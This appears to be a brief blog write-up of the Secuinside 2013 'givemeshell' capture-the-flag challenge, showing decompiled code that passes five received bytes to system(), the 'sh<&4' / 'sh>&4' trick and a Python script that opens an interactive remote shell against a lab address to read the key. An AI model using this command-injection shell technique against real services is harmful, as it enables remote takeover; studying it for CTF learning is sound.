2014년 6월 14일 토요일

Secuinside 2013 givemeshell

easy easy challenge


int __cdecl important_part(int fd)
{
int v1; // edx@1
int v2; // ecx@1
int result; // eax@3
char cmd; // [sp+16h] [bp-12h]@1
int canary; // [sp+1Ch] [bp-Ch]@1

canary = *MK_FP(__GS__, 20);
memset(&cmd, 0, 6u);
if ( recv(fd, &cmd, 5u, 0) > 0 ) // recv only 5byte
system(&cmd); // executes user input(5byte)
result = *MK_FP(__GS__, 20) ^ canary;
if ( *MK_FP(__GS__, 20) != canary )
__stack_chk_fail(v2, v1);
return result;
}

this is the important part.
only accepts 5bytes from user and executes it.

idea : sh<&4 sh>&4

exploit code

#!/usr/bin/python
from socket import *

def shell():
cmd = raw_input("$ ")
s.send(cmd+"\n")
print s.recv(1024)

s = socket(AF_INET,SOCK_STREAM)
s.connect(('10.211.55.4',8989))
s.send("sh<&4")
s.send("sh>&4\n")
while True:
shell()
s.close()

result

mangoui-MacBook-Pro:~ kjungi704$ ./givemeshell.py 
$ cat key
this is key

clear!